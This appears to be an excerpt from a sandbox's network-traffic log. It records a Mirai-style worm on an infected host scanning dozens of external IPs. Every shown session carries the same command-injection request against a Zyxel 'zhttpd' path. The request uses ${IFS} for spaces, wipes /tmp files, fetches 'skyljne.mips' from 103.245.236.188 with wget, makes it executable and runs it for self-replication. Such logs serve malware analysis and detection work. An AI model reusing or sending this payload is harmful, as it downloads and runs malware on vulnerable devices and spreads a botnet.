                                    Jan 13, 2024 19:02:43.394769907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6629192.168.2.134898463.222.182.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394836903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6630192.168.2.13561562.87.83.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394881010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6631192.168.2.1339366222.118.200.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394925117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6632192.168.2.1336924216.58.187.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395005941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6633192.168.2.135321051.123.63.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395057917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6634192.168.2.133926834.27.214.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395118952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6635192.168.2.135293895.161.170.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395160913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6636192.168.2.1338448114.77.134.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395241976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6637192.168.2.13346981.68.111.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395306110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6638192.168.2.1348774166.23.20.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395351887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6639192.168.2.1341170108.56.200.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395396948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6640192.168.2.134367691.100.124.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395447969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6641192.168.2.134763024.35.159.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395522118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6642192.168.2.134983224.225.138.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395577908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6643192.168.2.135437891.151.1.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395657063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6644192.168.2.134367861.1.158.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395721912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6645192.168.2.133415824.53.251.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395775080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6646192.168.2.1345848150.6.233.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395853043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6647192.168.2.1336988158.227.79.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395936012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6648192.168.2.133831063.192.245.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.395992041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6649192.168.2.133902045.108.152.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396055937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6650192.168.2.1336220185.216.89.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396104097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6651192.168.2.1348410126.253.105.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396183968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6652192.168.2.1337866223.243.28.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396262884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6653192.168.2.1357576114.99.75.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396311045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6654192.168.2.134856636.22.117.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396399021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6655192.168.2.134151285.195.218.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396440029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6656192.168.2.1338990208.235.64.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396492004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6657192.168.2.1358060152.173.138.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396531105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6658192.168.2.134655884.213.70.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396614075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6659192.168.2.134321812.93.118.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396666050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6660192.168.2.1354774153.33.209.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396729946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6661192.168.2.133295813.66.185.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396790028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6662192.168.2.1344936156.87.202.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396842957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6663192.168.2.1348976111.8.180.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396907091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6664192.168.2.133506239.57.205.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396960020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6665192.168.2.1339196135.144.28.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.396998882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6666192.168.2.133376294.161.54.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397079945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6667192.168.2.133299892.108.215.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397128105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6668192.168.2.1356922131.223.115.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397170067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6669192.168.2.133476686.116.66.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397231102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6670192.168.2.1333718197.179.148.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397275925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6671192.168.2.1349560123.104.168.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397336960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6672192.168.2.1335990158.86.87.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397408009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6673192.168.2.135259646.131.7.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397455931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6674192.168.2.1360036137.202.198.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397551060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6675192.168.2.135869691.38.159.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397603035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6676192.168.2.134575619.184.51.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397675037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6677192.168.2.1335360190.171.75.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397701979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6678192.168.2.1359260103.196.85.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397774935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6679192.168.2.1342216158.149.3.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397835970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6680192.168.2.1360336222.82.255.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397921085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6681192.168.2.133766424.176.239.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.397979021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6682192.168.2.136048697.253.161.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398015022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6683192.168.2.134442472.106.0.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398092031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6684192.168.2.133511235.144.46.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398132086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6685192.168.2.135069844.221.151.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398230076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6686192.168.2.1346592203.73.169.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398283958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6687192.168.2.133859047.223.17.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398359060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6688192.168.2.134545284.230.200.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398394108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6689192.168.2.134996814.75.25.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398458004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6690192.168.2.1338314206.236.54.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398494959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6691192.168.2.1335852211.11.117.70443
                                    TimestampBytes transferredDirectionData
